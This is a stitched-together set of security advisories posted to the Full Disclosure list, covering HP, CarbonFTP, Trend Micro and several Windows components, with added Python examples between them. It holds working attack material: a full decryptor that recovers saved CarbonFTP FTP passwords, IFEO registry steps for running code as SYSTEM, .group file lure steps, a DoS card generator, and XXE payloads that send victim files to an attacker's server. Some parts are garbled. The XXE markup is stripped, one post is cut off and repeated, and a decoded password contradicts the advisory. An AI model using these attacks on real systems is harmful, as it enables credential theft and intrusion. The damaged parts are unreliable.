HPMSGSVC.exe runs a background process that delivers push notifications.

The problem is that HP Message Service will load and execute any arbitrary
executable named "Program.exe" if found in the root of the user's C:\ drive.

Path: C:\Program Files (x86)\HP\HP System Event\SmrtAdptr.exe

This is the classic unquoted-path behaviour: when the space-containing path
above is handed to CreateProcess without quotes, Windows tries C:\Program.exe
before the intended binary.

Two handles are inherited, properties are Write/Read
Name: \Device\ConDrv

This results in an arbitrary code execution persistence mechanism if an
attacker can place an EXE in this location, and can be used to escalate
privileges from Admin to SYSTEM.

HP has released a mitigation:
https://support.hp.com/us-en/document/c06559359


[References]
PSR-2019-0204
https://support.hp.com/us-en/document/c06559359



[Network Access]
Local


[Disclosure Timeline]
Vendor Notification: October 7, 2019
HP PSRT "product team will address the issue in next release": January 13, 2020
HP advisory and mitigation release: February 10, 2020
February 11, 2020: Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] [UPDATED - POC] Neowise CarbonFTP v1.4 / Insecure Proprietary Password Encryption / CVE-2020-6857

2020-01-24 Thread hyp3rlinx
Updated: the exploit PoC had a check for an unused module I was testing, which has been
removed. I had two versions but previously sent the wrong one.

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.neowise.com


[Product]
CarbonFTP v1.4

CarbonFTP is a file synchronization tool that enables you to synch local
files with a remote FTP server and vice versa.
It provides a step-by-step wizard to select the folders to be synchronized,
the direction of the synchronization and option
to set file masks to limit the transfer to specific file types. Your
settings can be saved as projects, so they can be
quickly re-used later.

Download: https://www.neowise.com/freeware/
Hash: 7afb242f13a9c119a17fe66c6f00a1c8


[Vulnerability Type]
Insecure Proprietary Password Encryption


[CVE Reference]
CVE-2020-6857


[Affected Component]
Password Encryption


[Impact Escalation of Privileges]
true


[Impact Information Disclosure]
true


[Security Issue]
CarbonFTP v1.4 uses insecure proprietary password encryption with a
hard-coded weak encryption key.
The key for locally stored FTP server passwords is hard-coded in the
binary. Passwords encoded as hex are converted to decimal, and the key
"97F" is then added to the result. The key 97F seems to be the same for
all executables across all systems. Finally, passwords are stored as
decimal values.

If a user chooses to save the project the passwords are stored in ".CFTP"
local configuration files.
They can be found under
"C:\Users\\AppData\Roaming\Neowise\CarbonFTPProjects".

e.g.

Password=STRING|"2086721956209392195620939"

Observing some very short password examples we see interesting patterns:

27264 27360 27360 27360 27360=   a
27520 27617 27617 27617 27617=   b
27266 27616 27360 27361 27616=   aab
27521 27616 27616 27616 27616=   ba

Password encryption/decryption is as follows.

Encryption process example.
484C as decimal is the value 18508
97F hex to decimal is the value 2431 (encrypt key)
18508 + 2431 = 20939, the value 20939 would then represent the ascii
characters "HL".

To decrypt we just perform the reverse of the operation above.
20939 - 2431 = 18508
Next, convert the decimal value 18508 to hex and we get 484C.
Finally, convert the hex value 484C to ascii to retrieve the plaintext
password of "HL".

CarbonFTP passwords less than nine characters are padded using chars from
the current password up until
reaching a password length of nine bytes.

The two char password "XY" in encrypted form "2496125048250482504825048" is
padded with "XY" until reaching a length
of nine bytes "XYXYXYXYX".

Similarly, the password "HELL" is "2086721956209392195620939" and again is
padded since its length is less than nine bytes.

Therefore, we will get several cracked password candidates like: "HELLHELL
| HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH"
However, the longer the password the easier it becomes to crack them, as we
can decrypt passwords in one
shot without having several candidates to choose from with one of them
being the correct password.

Therefore, "LONGPASSWORD!" is stored as the encrypted string
"219042273422734224782298223744247862350210947"
and because it is greater than nine bytes it is cracked without any
candidate passwords returned.

From offset 0047DA6F to 0047DAA0 is the loop that performs the password
decryption process.
Using the same password "HELL" as example.

BPX @47DA6F

0047DA6F | 8D 45 F0       | lea eax,dword ptr ss:[ebp-10]
0047DA72 | 50             | push eax
0047DA73 | B9 05 00 00 00 | mov ecx,5
0047DA78 | 8B D3          | mov edx,ebx
0047DA7A | 8B 45 FC       | mov eax,dword ptr ss:[ebp-4]      ; [ebp-4]:"2086721956209392195620939"
0047DA7D | E8 F6 6B F8 FF | call carbonftp.404678
0047DA82 | 83 C3 05       | add ebx,5
0047DA85 | 8B 45 F0       | mov eax,dword ptr ss:[ebp-10]     ; [ebp-10]:"20867"
0047DA88 | E8 AF AD F8 FF | call carbonftp.40883C
0047DA8D | 2B 45 F8       | sub eax,dword ptr ss:[ebp-8]      ; <=== BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431
0047DA90 | 66 89 06       | mov word ptr ds:[esi],ax
0047DA93 | 83 C6 02       | add esi,2
0047DA96 | 8B 45 FC       | mov eax,dword ptr ss:[ebp-4]      ; [ebp-4]:"2086721956209392195620939"
0047DA99 | E8 7A 69 F8 FF | call carbonftp.404418
0047DA9E | 3B D8          | cmp ebx,ea

[FD] Neowise CarbonFTP v1.4 / Insecure Proprietary Password Encryption / CVE-2020-6857

2020-01-21 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.neowise.com


[Product]
CarbonFTP v1.4

CarbonFTP is a file synchronization tool that enables you to synch local
files with a remote FTP server and vice versa.
It provides a step-by-step wizard to select the folders to be synchronized,
the direction of the synchronization and option
to set file masks to limit the transfer to specific file types. Your
settings can be saved as projects, so they can be
quickly re-used later.

Download: https://www.neowise.com/freeware/
Hash: 7afb242f13a9c119a17fe66c6f00a1c8


[Vulnerability Type]
Insecure Proprietary Password Encryption


[CVE Reference]
CVE-2020-6857


[Affected Component]
Password Encryption


[Impact Escalation of Privileges]
true


[Impact Information Disclosure]
true


[Security Issue]
CarbonFTP v1.4 uses insecure proprietary password encryption with a
hard-coded weak encryption key.
The key for locally stored FTP server passwords is hard-coded in the
binary. Passwords encoded as hex are converted to decimal, and the key
"97F" is then added to the result. The key 97F seems to be the same for
all executables across all systems. Finally, passwords are stored as
decimal values.

If a user chooses to save the project the passwords are stored in ".CFTP"
local configuration files.
They can be found under
"C:\Users\\AppData\Roaming\Neowise\CarbonFTPProjects".

e.g.

Password=STRING|"2086721956209392195620939"

Observing some very short password examples we see interesting patterns:

27264 27360 27360 27360 27360=   a
27520 27617 27617 27617 27617=   b
27266 27616 27360 27361 27616=   aab
27521 27616 27616 27616 27616=   ba

Password encryption/decryption is as follows.

Encryption process example.
484C as decimal is the value 18508
97F hex to decimal is the value 2431 (encrypt key)
18508 + 2431 = 20939, the value 20939 would then represent the ascii
characters "HL".

To decrypt we just perform the reverse of the operation above.
20939 - 2431 = 18508
Next, convert the decimal value 18508 to hex and we get 484C.
Finally, convert the hex value 484C to ascii to retrieve the plaintext
password of "HL".

CarbonFTP passwords less than nine characters are padded using chars from
the current password up until
reaching a password length of nine bytes.

The two char password "XY" in encrypted form "2496125048250482504825048" is
padded with "XY" until reaching a length
of nine bytes "XYXYXYXYX".

Similarly, the password "HELL" is "2086721956209392195620939" and again is
padded since its length is less than nine bytes.

Therefore, we will get several cracked password candidates like: "HELLHELL
| HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH"
However, the longer the password the easier it becomes to crack them, as we
can decrypt passwords in one
shot without having several candidates to choose from with one of them
being the correct password.

Therefore, "LONGPASSWORD!" is stored as the encrypted string
"219042273422734224782298223744247862350210947"
and because it is greater than nine bytes it is cracked without any
candidate passwords returned.

From offset 0047DA6F to 0047DAA0 is the loop that performs the password
decryption process.
Using the same password "HELL" as example.

BPX @47DA6F

0047DA6F | 8D 45 F0       | lea eax,dword ptr ss:[ebp-10]
0047DA72 | 50             | push eax
0047DA73 | B9 05 00 00 00 | mov ecx,5
0047DA78 | 8B D3          | mov edx,ebx
0047DA7A | 8B 45 FC       | mov eax,dword ptr ss:[ebp-4]      ; [ebp-4]:"2086721956209392195620939"
0047DA7D | E8 F6 6B F8 FF | call carbonftp.404678
0047DA82 | 83 C3 05       | add ebx,5
0047DA85 | 8B 45 F0       | mov eax,dword ptr ss:[ebp-10]     ; [ebp-10]:"20867"
0047DA88 | E8 AF AD F8 FF | call carbonftp.40883C
0047DA8D | 2B 45 F8       | sub eax,dword ptr ss:[ebp-8]      ; <=== BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431
0047DA90 | 66 89 06       | mov word ptr ds:[esi],ax
0047DA93 | 83 C6 02       | add esi,2
0047DA96 | 8B 45 FC       | mov eax,dword ptr ss:[ebp-4]      ; [ebp-4]:"2086721956209392195620939"
0047DA99 | E8 7A 69 F8 FF | call carbonftp.404418
0047DA9E | 3B D8          | cmp ebx,eax
0047DAA0 | 7E CD          | jle carbonftp.47DA6F


Ok, simple explanation after SetBPX in 47DA
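The add-0x97F scheme described in both CVE-2020-6857 posts above is enough to write a decoder. The following is an added example, not part of the advisory or of CarbonFTP: it implements the scheme and reproduces the sample strings quoted above. Working the samples through with the 5-digit grouping (mov ecx,5 / add ebx,5) and the little-endian word store (mov word ptr [esi],ax) surfaces one detail the text does not mention: the low byte of the first decoded word is the password length (4 for "HELL", 2 for "XY", 1 for "a", 3 for "aab"), which removes the candidate ambiguity, and the 45-digit sample decodes to the 17-character "LOOOOONGPASSWORD!". Two points are assumptions of this example and are marked in the comments: zero-padding of any group below 10000, and how an even-length password of ten or more characters is padded to whole words. The .CFTP fragment is constructed from the ciphertexts quoted above.

```python
import re

KEY = 0x97F        # 2431 decimal: the hard-coded add/sub constant from the advisory
CHUNK = 5          # the decrypt loop consumes 5-character substrings (mov ecx,5 / add ebx,5)
MIN_PAD = 9        # passwords shorter than nine characters are repeated up to nine


def parse_cftp_password(line: str) -> str:
    """Pull the numeric string out of a .CFTP 'Password=STRING|"..."' line."""
    m = re.search(r'Password=STRING\|"(\d+)"', line)
    if not m:
        raise ValueError("no CarbonFTP password field in line")
    return m.group(1)


def decrypt(cipher: str) -> str:
    """Recover the plaintext from a CarbonFTP password string."""
    if not cipher.isdigit() or len(cipher) % CHUNK:
        raise ValueError("ciphertext must be decimal digits in groups of five")
    words = [int(cipher[i:i + CHUNK]) - KEY for i in range(0, len(cipher), CHUNK)]
    if any(not 0 <= w <= 0xFFFF for w in words):
        raise ValueError("word out of 16-bit range: wrong key or corrupt string")
    # 'mov word ptr [esi],ax' stores each word little-endian, so the low byte comes first.
    raw = b"".join(w.to_bytes(2, "little") for w in words)
    length, chars = raw[0], raw[1:]          # first byte is the real password length
    if length > len(chars):
        raise ValueError("length byte exceeds decoded characters")
    return chars[:length].decode("latin-1")


def encrypt(password: str) -> str:
    """Inverse of decrypt(); reproduces the advisory's sample strings."""
    data = password.encode("latin-1")
    if not 0 < len(data) < 256:
        raise ValueError("password must be 1..255 bytes")
    # Repeat the password until it is at least nine bytes, then cut at nine ("XY" -> "XYXYXYXYX").
    padded = (data * (MIN_PAD // len(data) + 1))[:MIN_PAD] if len(data) < MIN_PAD else data
    raw = bytes([len(data)]) + padded
    if len(raw) % 2:
        # Assumption: an even-length password of ten or more bytes gets one more cyclic pad byte
        # so the buffer is whole 16-bit words; the advisory shows no sample for that case.
        raw += bytes([data[len(padded) % len(data)]])
    words = [int.from_bytes(raw[i:i + 2], "little") + KEY for i in range(0, len(raw), 2)]
    # Assumption: groups below 10000 are zero-padded, since the decrypt loop reads fixed 5-char groups.
    return "".join(f"{w:05d}" for w in words)


def crack_cftp(text: str):
    """Decrypt every Password= line of a .CFTP project file."""
    return [decrypt(parse_cftp_password(l)) for l in text.splitlines() if "Password=STRING|" in l]


# Constructed .CFTP fragment using the ciphertext samples quoted in the advisory.
SAMPLE_CFTP = """Password=STRING|"2086721956209392195620939"
Password=STRING|"2496125048250482504825048"
Password=STRING|"219042273422734224782298223744247862350210947"
"""

if __name__ == "__main__":
    for pw in crack_cftp(SAMPLE_CFTP):
        print(pw, "->", encrypt(pw))
```

Because the length byte travels with the ciphertext, a decoder never has to choose between "HELL", "HEL" and "HELLHELL"; the padding only ever adds noise after the length.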

[FD] CVE-2019-19697 / Trend Micro Security 2019 (Consumer) / Security Bypass Protected Service Tampering

2020-01-17 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-SECURITY-CONSUMER-SECURITY-BYPASS-PROTECTED-SERVICE-TAMPERING.txt
[+] ISR: ApparitionSec


[Vendor]
www.trendmicro.com


[Product]
Trend Micro Security 2019 (Consumer) Multiple Products


Trend Micro Security provides comprehensive protection for your devices.
This includes protection against ransomware, viruses, malware, spyware, and
identity theft.


[Vulnerability Type]
Security Bypass Protected Service Tampering


[CVE Reference]
CVE-2019-19697


[Security Issue]
Trend Micro Maximum Security is vulnerable to arbitrary code execution, as
it allows creation of an Image File Execution Options registry key that
targets one of its processes running as SYSTEM.
Malware can use this to gain elevated privileges and take over or shut down
services that run with SYSTEM privileges, such as Trend Micro's "Asmp"
service "coreServiceShell.exe", which does not allow Administrators to
tamper with it.

This could allow an attacker or malware to gain elevated privileges and
tamper with protected services by disabling them or otherwise preventing
them from starting.
Note that administrator privileges are required to exploit this
vulnerability.


[CVSS 3.0 Scores: 3.9]


[Affected versions]
Platform Microsoft Windows
Premium Security 2019 (v15)
Maximum Security 2019 (v15)
Internet Security 2019 (v15)
Antivirus + Security 2019 (v15)


[References]
https://esupport.trendmicro.com/en-us/home/pages/technical-support/1124090.aspx


[Exploit/POC]
1) Create the following registry key, targeting "PtWatchdog.exe":
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File
Execution Options\PtWatchdog.exe

2) Under that key create a string value named "debugger" and set it to the
path of the executable you wish to run as SYSTEM.

3) Restart the machine, or wait until the service restarts. The executable
then runs as SYSTEM and can disable the Trend Micro endpoint security
coreServiceShell.exe service.
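As an added example (not part of the advisory), here is a Python check for the technique above: it parses a "reg export" of the Image File Execution Options key and reports every subkey whose Debugger value points outside a trusted directory. The .reg text is a constructed sample, and the trusted-directory list is an assumption to tune per environment.

```python
import re
from typing import Dict, List

# Image File Execution Options root, as named in the advisory.
IFEO_PREFIX = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT"
               r"\CurrentVersion\Image File Execution Options")

# Directories a legitimate debugger is expected to live in. This allow-list is
# an assumption made for the example; adjust it to the environment.
TRUSTED_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\program files\\windows kits\\",
    "c:\\program files (x86)\\microsoft visual studio\\",
)

# Constructed sample in "reg export" (.reg) syntax, not a dump from a real host.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PtWatchdog.exe]
"Debugger"="C:\\Users\\Public\\evil.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Windows\\System32\\vsjitdebugger.exe -p"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe]
"GlobalFlag"=dword:00000200
'''


def parse_ifeo_debuggers(reg_text: str) -> Dict[str, str]:
    """Map image name -> Debugger value for every IFEO subkey that carries one."""
    debuggers: Dict[str, str] = {}
    current_image = None
    prefix = IFEO_PREFIX.lower() + "\\"
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            current_image = key[len(prefix):] if key.lower().startswith(prefix) else None
            continue
        m = re.match(r'"Debugger"="(.*)"$', line, re.IGNORECASE)
        if m and current_image:
            # .reg files escape backslashes and embedded quotes.
            debuggers[current_image] = m.group(1).replace('\\"', '"').replace("\\\\", "\\")
    return debuggers


def debugger_executable(value: str) -> str:
    """Pull the program path out of a Debugger value that may carry arguments.

    Quoted paths are taken verbatim. Unquoted ones are cut at the first space,
    so an unquoted path with spaces is judged by its first component, which
    errs on the side of reporting it.
    """
    value = value.strip()
    if value.startswith('"') and value.count('"') >= 2:
        return value[1:value.index('"', 1)]
    return value.split(" ", 1)[0]


def is_trusted(path: str) -> bool:
    return path.lower().startswith(TRUSTED_DIRS)


def find_ifeo_hijacks(reg_text: str) -> List[str]:
    """Image names whose Debugger points outside the trusted directories."""
    return sorted(image for image, value in parse_ifeo_debuggers(reg_text).items()
                  if not is_trusted(debugger_executable(value)))


if __name__ == "__main__":
    found = parse_ifeo_debuggers(SAMPLE_REG)
    for image in find_ifeo_hijacks(SAMPLE_REG):
        print(f"[!] IFEO Debugger hijack on {image}: {found[image]}")
```

On a live host the input would come from `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg /y`; the PtWatchdog.exe entry in the sample is exactly the shape step 2 above produces.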


[Network Access]
Local


[Severity]
Low


[Disclosure Timeline]
Vendor Notification: October 8, 2019
Vendor confirms issue: October 28, 2019
Vendor release date: January 14, 2020
January 16, 2020 : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Microsoft Windows VCF Card / Mailto Link Denial Of Service

2020-01-07 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-MAILTO-LINK-DENIAL-OF-SERVICE.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
A VCF file is a standard file format for storing contact information for a
person or business.
Microsoft Outlook supports the vCard and vCalendar features.
These are a powerful new approach to electronic Personal Data Interchange
(PDI).


[Vulnerability Type]
Mailto Link Denial Of Service


[CVE Reference]
N/A


[Security Issue]
Windows VCF cards do not properly sanitize email addresses, allowing HTML
injection.
A corrupt VCF card can cause all of the user's currently open files and
applications to be closed and their session to be terminated, without
requiring any accompanying attacker-supplied code.

This is done by crafting the Mailto link to point at the Windows
"logoff.exe" executable. If the VCF card is opened in Windows Contacts and
the link is clicked, the corrupt card kills all of the user's applications
and logs the target off their computer.

The logoff.exe executable lives in "C:\Windows\System32" and terminates
applications and logs out the user without requiring any arguments.

This will probably affect Windows 7 the most, as Windows 10 may default to
opening VCF files in other programs such as People. However, users can
still choose to open the VCF in Contacts by right-clicking the file.

Note: this exploit requires user interaction.

[Exploit/POC]
"VCF_DoS.py"

# Python 3 (the archived original used Python 2 print statements).
dirty_vcf = (
    'BEGIN:VCARD\n'
    'VERSION:4.0\n'
    'FN:Session Terminate PoC - ApparitionSec\n'
    'EMAIL:d...@microsoft.com\n'   # address is elided in the archived advisory
    'END:VCARD')

with open("DoS.vcf", "w") as f:
    f.write(dirty_vcf)

print("VCF Denial Of Service card created!")
print("By hyp3rlinx")


[POC Video URL]
https://www.youtube.com/watch?v=P4OGN7pZLSg


[Network Access]
Local


[Severity]
Medium


[Disclosure Timeline]
Vendor Notification: January 2, 2020
MSRC : "In order to investigate your report I will need an explanation on
how an attacker could use the information to exploit another user remotely
without the use of social engineering... As such, this thread is being
closed" : January 3, 2020
January 4, 2020 : Public Disclosure




[FD] Microsoft Windows .Group File / URL Field Code Execution

2020-01-03 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.GROUP-FILE-URL-FIELD-CODE-EXECUTION.txt
[+] twitter.com/hyp3rlinx
[+] apparitionsec@gmail
[+] ISR: Apparition Security


[Vendor]
www.microsoft.com


[Product]
Windows ".Group" File Type

Group files are a collection of contacts created by Windows Contacts, an
embedded contact management program included with Windows.
A .group file contains a list of contacts saved into a group, which can be
used to create a mailing list for sending email messages to multiple
addresses at once.


[Vulnerability Type]
URL Field Code Execution


[CVE Reference]
N/A


[Security Issue]
Windows ".group" files are related to Contact files and suffer from
unexpected code execution when the "Contact Group Details" tab's Website
"Go" button is clicked. This happens if the website URL field points to an
executable file. It is the same type of vulnerability that affects Windows
.contact files, which remains unfixed as of this writing and has a
Metasploit module available.

[References]
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt

Therefore, attacker-supplied executables can run unexpectedly for the user,
who believes they are visiting a website when clicking the Website "Go"
button.
Moreover, if the files are compressed using certain archive utilities it
may be possible to skirt security warnings even when the executable was
downloaded from the internet or copied from a network share.

This exploit requires a bit more user interaction than the previously
disclosed .contact file vulnerability, as the GROUP file will complain if it
is not in the Contacts directory. The advisory is released for the sake of
completeness and user security awareness.


[Exploit/POC]
1) Create a Windows .group file.

2) Create a directory named "http".

3) Create an executable file with a .com extension (rename .exe to .com),
for example "www.microsoft.com", and place it in the "http" directory
alongside the .group file.

4) Point the website URL field at the executable using path traversal, e.g.
"http.\www.microsoft.com", which becomes the website address stored in the
.group file.

Note: the directory traversal can also point to other directories, such as
"..\Downloads\http.\microsoft.com", but the downside is that the URL looks
very sketchy.

5) Package it up in an archive (.rar etc.).

6) Send the .group file via email, or have it downloaded, and lure the user
into placing the archive in the "c:\User\\Contacts" directory.

7) Open the archive and double-click the .group file (Windows will complain
with an error telling you to move it to the Contacts folder if it is not
already in that directory), then click the website address "Go" button.

The attacker's executable will run instead of navigating to a website, as
the end user would expect.
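Added example, not code from either advisory: a Python validator for the two Windows Contacts fields abused in the VCF advisory above (an EMAIL value carrying HTML/mailto markup that points at logoff.exe) and in this .group advisory (a website URL that is really a local path such as "http.\www.microsoft.com"). The sample cards are constructed; the hostile EMAIL value only imitates the injection the VCF advisory describes, since the published card elides it.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import urlparse

# Strict mailbox shape: local part, "@", dotted host. Markup, quotes and path
# characters fail this on purpose.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+$")

# Extensions Windows will execute when "navigated" to (assumed list for the example).
EXEC_EXT = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".hta", ".lnk", ".js", ".vbs")

# Constructed samples: a clean card and one carrying both hostile fields.
CLEAN_CARD = (
    "BEGIN:VCARD\nVERSION:4.0\nFN:Alice Example\n"
    "EMAIL;TYPE=work:alice@example.com\nURL:https://example.com/\nEND:VCARD\n")

HOSTILE_CARD = (
    "BEGIN:VCARD\nVERSION:4.0\nFN:Session Terminate PoC\n"
    'EMAIL:<a href="C:\\Windows\\System32\\logoff.exe">bob@example.com</a>\n'
    "URL:http.\\www.microsoft.com\n"
    "END:VCARD\n")


def unfold(text: str) -> List[str]:
    """vCard line unfolding: a line starting with space/tab continues the previous one."""
    lines: List[str] = []
    for raw in text.splitlines():
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def split_property(line: str) -> Tuple[str, str]:
    """'EMAIL;TYPE=work:x@y' -> ('EMAIL', 'x@y'); parameters are dropped."""
    name, _, value = line.partition(":")
    return name.split(";", 1)[0].strip().upper(), value.strip()


def check_email(value: str) -> Optional[str]:
    if any(ch in value for ch in '<>"\\'):
        return "markup or path characters in address"
    if not EMAIL_RE.match(value):
        return "not a plain mailbox address"
    return None


def check_url(value: str) -> Optional[str]:
    if "\\" in value:
        return "backslash in URL (local path, not a web address)"
    parsed = urlparse(value)
    if parsed.scheme.lower() not in ("http", "https") or not parsed.netloc:
        return "not an absolute http(s) URL"
    if parsed.path.lower().endswith(EXEC_EXT):
        return "URL path ends in an executable extension"
    return None


def audit_contact(text: str) -> List[Tuple[str, str, str]]:
    """Return (property, value, problem) for every EMAIL/URL value that fails the checks."""
    findings = []
    for line in unfold(text):
        if ":" not in line:
            continue
        name, value = split_property(line)
        if name == "EMAIL":
            problem = check_email(value)
        elif name == "URL":
            problem = check_url(value)
        else:
            problem = None
        if problem:
            findings.append((name, value, problem))
    return findings


if __name__ == "__main__":
    for card in (CLEAN_CARD, HOSTILE_CARD):
        print(audit_contact(card) or "clean")
```

The same checks apply to a mail gateway or endpoint script that inspects .vcf and .group attachments before they reach Windows Contacts: anything that is not a bare mailbox address, or not an absolute http(s) URL to a non-executable resource, is rejected rather than rendered as a clickable link.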


[Severity]
High


[Disclosure Timeline]
Vendor Notification: Same type vuln affecting .contact files disclosed
January 16, 2019, status remains unfixed.
January 1, 2020 : Public Disclosure




[FD] Microsoft Windows Media Center / XXE MotW Bypass (Anniversary Edition)

2019-12-03 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WINDOWS-MEDIA-CENTER-MOTW-BYPASS-XXE-ANNIVERSARY-EDITION.txt
[+] ISR: Apparition Security


[Vendor]
www.microsoft.com


[Product]
Microsoft Windows Media Center

Windows Media Center is a discontinued digital video recorder and media
player created by Microsoft.
Media Center was first introduced to Windows in 2002 on Windows XP Media
Center.


[Vulnerability Type]
XML External Entity MotW Bypass (Anniversary Edition)


[CVE Reference]
N/A


[Security Issue]
This vulnerability was originally released by me back on December 4, 2016,
yet it remains unfixed.
To make matters worse, the "mark-of-the-web" (MotW) does not matter here;
it is simply ignored.
That is, if the .MCL file is downloaded from the internet it gets the MotW,
but files are still exfiltrated.

Therefore, I am releasing this "anniversary edition" of the XXE with the
MotW information.

This is a fully working remote information disclosure vulnerability that
still affects Windows 7.
Windows 7 is near end of life this January, yet it is still used by many
organizations.
Furthermore, it seems that Windows 8.1 (Pro) can also run Windows Media
Center, but I have not tested it.

Host the "FindMeThatBiotch.dtd" DTD file in the web root of the attacker's
server (port 80, etc.).
Download the ".mcl" file using Microsoft Internet Explorer.

Check the MotW in the directory where you downloaded the .mcl file ("dir
/r") and note that the Zone.Identifier:$DATA stream exists.
Open the file and BOOM! Watch the files leave... still vulnerable after all
these years.

OS: Windows 7 (tested successfully) and possibly Windows 8.1 Pro


[Exploit/POC]
1) "M$-Wmc-Anniversary-Motw-Bypass.mcl"

# PoC


/FindMeThatBiotch.dtd">
%junk;
%param666;
%FindMeThatBiotch;
]>


2) "FindMeThatBiotch.dtd"
/%data666;'>">


3) Auto exploit PHP .mcl file downloader.

/M$-Wmc-Anniversary-Motw-Bypass.mcl';
header('Content-Type: application/octet-stream');
header("Content-Transfer-Encoding: Binary");
header("Content-disposition: attachment; filename=\"" . basename($url) .
"\"");
readfile($url);
?>


4) python -m SimpleHTTPServer 80



[POC Video URL]
https://www.youtube.com/watch?v=zcrATpBNAZ0


[Network Access]
Remote



[Severity]
High


[Disclosure Timeline]
Vendor Notification:  December 4, 2016
MSRC "wont fix"
Dec 2, 2019 : Re-Public "unfixed anniversary" Disclosure





[FD] Microsoft Visual Studio 2008 Express IDE / XML External Entity Injection

2019-12-03 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Visual Studio 2008 Express IDE
vcsetup.exe
File hash: 62f764849e8fcdf8bfbc342685641304
Download: http://go.microsoft.com/?linkid=7729279


[Vulnerability Type]
XML External Entity Injection 0Day


[CVE Reference]
N/A


[Security Issue]
The Visual Studio 2008 IDE suffers from XML External Entity injection.
Attackers can leverage many file types, some of them MASM related, such as
.asm or .lst.
Opening any one of the file types listed below can allow remote attackers
to steal files from the victim's computer, sending them to the remote
attacker's server.

Double-click any of the following extensions and it will trigger the XXE
vulnerability. Note that upon installation of the IDE the following file
types are associated with Visual Studio 2008; ALL of them are vulnerable
and will trigger the XXE exploit.

[Vuln XXE file types]
.snippet
.i
.s
.asm
.disco
.lst
.inc
.srf
.wsdl
.rgs
.xml

This IDE is pretty old, I know, but it is still available for download as
of this writing, therefore I am releasing the advisory.


[References]
https://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/


[Exploit/POC]
"Evil.snippet" or any of the extensions mentioned above.



http://127.0.0.1:8000/payload.dtd;>
%dtd;]>



"payload.dtd"


http://127.0.0.1:8000?%file;'>">
%all;


python -m SimpleHTTPServer
python -m http.server (Python3)


